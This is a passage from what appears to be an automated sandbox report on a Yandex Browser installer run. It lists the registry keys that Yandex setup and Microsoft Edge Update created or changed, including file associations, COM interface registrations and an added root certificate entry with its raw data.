| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\YandexSWF.7Z7T3FIA4OO255MEQLLMNQ5LPE\shell\open | C:\Users\Admin\AppData\Local\Temp\YB_FC3C6.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.CoreClass\ = "Microsoft Edge Update Core Class" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{99F8E195-1042-4F89-A28C-89CDB74A14AE}\NumMethods\ = "13" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7B3B7A69-7D88-4847-A6BC-90E246A41F69}\ProxyStubClsid32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.25\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\YandexHTML.7Z7T3FIA4OO255MEQLLMNQ5LPE\Application\ApplicationDescription = "Яндекс\u00a0Браузер – это быстрая и\u00a0удобная программа для\u00a0работы в\u00a0интернете и\u00a0просмотра веб-страниц." | C:\Users\Admin\AppData\Local\Temp\YB_FC3C6.tmp\setup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\YandexTIFF.7Z7T3FIA4OO255MEQLLMNQ5LPE\shell\open | C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\24.10.1.598\Installer\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{FCE48F77-C677-4012-8A1A-54D2E2BC07BD}\NumMethods | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C20433B3-0D4B-49F6-9B6C-6EE0FAE07837}\ProxyStubClsid32\ = "{B019EEF0-C45E-464D-81C8-23283376FB2C}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C20433B3-0D4B-49F6-9B6C-6EE0FAE07837}\NumMethods | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3A49F783-1C7D-4D35-8F63-5C1C206B9B6E} | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.25\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{195A2EB3-21EE-43CA-9F23-93C2C9934E2E}\NumMethods\ = "41" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.25\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2EC826CB-5478-4533-9015-7580B3B5E03A} | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.25\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\YandexBrowser.crx\Application\ApplicationIcon = "C:\\Users\\Admin\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe,0" | C:\Users\Admin\AppData\Local\Temp\YB_FC3C6.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\YandexJPEG.7Z7T3FIA4OO255MEQLLMNQ5LPE\Application\AppUserModelId = "Yandex.7Z7T3FIA4OO255MEQLLMNQ5LPE" | C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\24.10.1.598\Installer\setup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\.js\OpenWithProgids\YandexJS.7Z7T3FIA4OO255MEQLLMNQ5LPE | C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\24.10.1.598\Installer\setup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\yabrowser\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe,0" | C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\24.10.1.598\Installer\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3805CA06-AC83-4F00-8A02-271DCD89BDEB}\ProxyStubClsid32\ = "{B019EEF0-C45E-464D-81C8-23283376FB2C}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.25\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E55B90F1-DA33-400B-B09E-3AFF7D46BD83}\ProxyStubClsid32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9A6B447A-35E2-4F6B-A87B-5DEEBBFDAD17}\NumMethods | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.25\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{99F8E195-1042-4F89-A28C-89CDB74A14AE} | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.25\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1D15A374-D691-4A48-8CF3-F162414FF70F} | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{177CAE89-4AD6-42F4-A458-00EC3389E3FE} | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.25\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.Update3COMClassService.1.0\ = "Update3COMClass" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{60355531-5BFD-45AB-942C-7912628752C7}\ProxyStubClsid32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.25\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\YandexEPUB.7Z7T3FIA4OO255MEQLLMNQ5LPE\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe,-121" | C:\Users\Admin\AppData\Local\Temp\YB_FC3C6.tmp\setup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\YandexCSS.7Z7T3FIA4OO255MEQLLMNQ5LPE\DefaultIcon | C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\24.10.1.598\Installer\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{CECDDD22-2E72-4832-9606-A9B0E5E344B2}\ = "ServiceModule" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B5977F34-9264-4AC3-9B31-1224827FF6E8}\VersionIndependentProgID | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DDD4B5D4-FD54-497C-8789-0830F29A60EE}\ProxyStubClsid32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.25\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\.mhtml\OpenWithProgids\YandexHTML.7Z7T3FIA4OO255MEQLLMNQ5LPE | C:\Users\Admin\AppData\Local\Temp\YB_FC3C6.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\YandexTXT.7Z7T3FIA4OO255MEQLLMNQ5LPE\Application\ApplicationIcon = "C:\\Users\\Admin\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe,0" | C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\24.10.1.598\Installer\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AB4EE1FC-0A81-4F56-B0E2-248FB78051AF}\ProxyStubClsid32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.25\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.Update3WebMachineFallback\ = "Microsoft Edge Update Update3Web" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\YandexINFE.7Z7T3FIA4OO255MEQLLMNQ5LPE\Application\AppUserModelId = "Yandex.7Z7T3FIA4OO255MEQLLMNQ5LPE" | C:\Users\Admin\AppData\Local\Temp\YB_FC3C6.tmp\setup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\.css\OpenWithProgids | C:\Users\Admin\AppData\Local\Temp\YB_FC3C6.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9A6B447A-35E2-4F6B-A87B-5DEEBBFDAD17}\ = "ICoCreateAsyncStatus" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.25\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C06EE550-7248-488E-971E-B60C0AB3A6E4} | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.25\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{177CAE89-4AD6-42F4-A458-00EC3389E3FE}\ProxyStubClsid32\ = "{B019EEF0-C45E-464D-81C8-23283376FB2C}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.25\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\YandexGIF.7Z7T3FIA4OO255MEQLLMNQ5LPE\shell | C:\Users\Admin\AppData\Local\Temp\YB_FC3C6.tmp\setup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\YandexPDF.7Z7T3FIA4OO255MEQLLMNQ5LPE | C:\Users\Admin\AppData\Local\Temp\YB_FC3C6.tmp\setup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\.txt | C:\Users\Admin\AppData\Local\Temp\YB_FC3C6.tmp\setup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\.epub | C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\24.10.1.598\Installer\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7584D24A-E056-4EB1-8E7B-632F2B0ADC69}\NumMethods | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\YandexGIF.7Z7T3FIA4OO255MEQLLMNQ5LPE\Application\ApplicationCompany = "Yandex" | C:\Users\Admin\AppData\Local\Temp\YB_FC3C6.tmp\setup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\YandexHTML.7Z7T3FIA4OO255MEQLLMNQ5LPE\Application | C:\Users\Admin\AppData\Local\Temp\YB_FC3C6.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB} | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.25\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{492E1C30-A1A2-4695-87C8-7A8CAD6F936F}\LocalizedString = "@C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.195.25\\msedgeupdate.dll,-3000" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AB4F4A7E-977C-4E23-AD8F-626A491715DF}\ = "IAppBundle" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.25\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\Net | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\YandexINFE.7Z7T3FIA4OO255MEQLLMNQ5LPE\Application\ApplicationDescription = "Яндекс\u00a0Браузер – это быстрая и\u00a0удобная программа для\u00a0работы в\u00a0интернете и\u00a0просмотра веб-страниц." | C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\24.10.1.598\Installer\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AB4EE1FC-0A81-4F56-B0E2-248FB78051AF}\ = "IPolicyStatus2" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.25\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\YandexHTML.7Z7T3FIA4OO255MEQLLMNQ5LPE | C:\Users\Admin\AppData\Local\Temp\YB_FC3C6.tmp\setup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\YandexSWF.7Z7T3FIA4OO255MEQLLMNQ5LPE\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\YB_FC3C6.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C06EE550-7248-488E-971E-B60C0AB3A6E4}\ProxyStubClsid32\ = "{B019EEF0-C45E-464D-81C8-23283376FB2C}" | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings | C:\Windows\SYSTEM32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\YandexSWF.7Z7T3FIA4OO255MEQLLMNQ5LPE | C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\24.10.1.598\Installer\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{195A2EB3-21EE-43CA-9F23-93C2C9934E2E} | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A5135E58-384F-4244-9A5F-30FA9259413C} | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.25\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1B9063E4-3882-485E-8797-F28A0240782F}\ = "IGoogleUpdate3WebSecurity" | C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.25\MicrosoftEdgeUpdateComRegisterShell64.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{FF419FF9-90BE-4D9F-B410-A789F90E5A7C}\LOCALSERVER32 | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\YandexCSS.7Z7T3FIA4OO255MEQLLMNQ5LPE\ = "Yandex Browser CSS Document" | C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\24.10.1.598\Installer\setup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\YandexTIFF.7Z7T3FIA4OO255MEQLLMNQ5LPE\shell\open\command | C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\24.10.1.598\Installer\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{77857D02-7A25-4B67-9266-3E122A8F39E4}\VersionIndependentProgID | C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\YandexHTML.7Z7T3FIA4OO255MEQLLMNQ5LPE | C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\24.10.1.598\Installer\setup.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E | C:\Users\Admin\Downloads\Yandex.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0400000001000000100000001bfe69d191b71933a372a80fe155e5b50f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e190000000100000010000000ea6089055218053dd01e37e1d806eedf2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd | C:\Users\Admin\Downloads\Yandex.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 5c000000010000000400000000100000190000000100000010000000ea6089055218053dd01e37e1d806eedf0300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e0b00000001000000100000005300650063007400690067006f0000001d0000000100000010000000885010358d29a38f059b028559c95f901400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd253000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd9796254830400000001000000100000001bfe69d191b71933a372a80fe155e5b52000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd | C:\Users\Admin\Downloads\Yandex.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8 | C:\Users\Admin\Downloads\Yandex.exe | N/A |
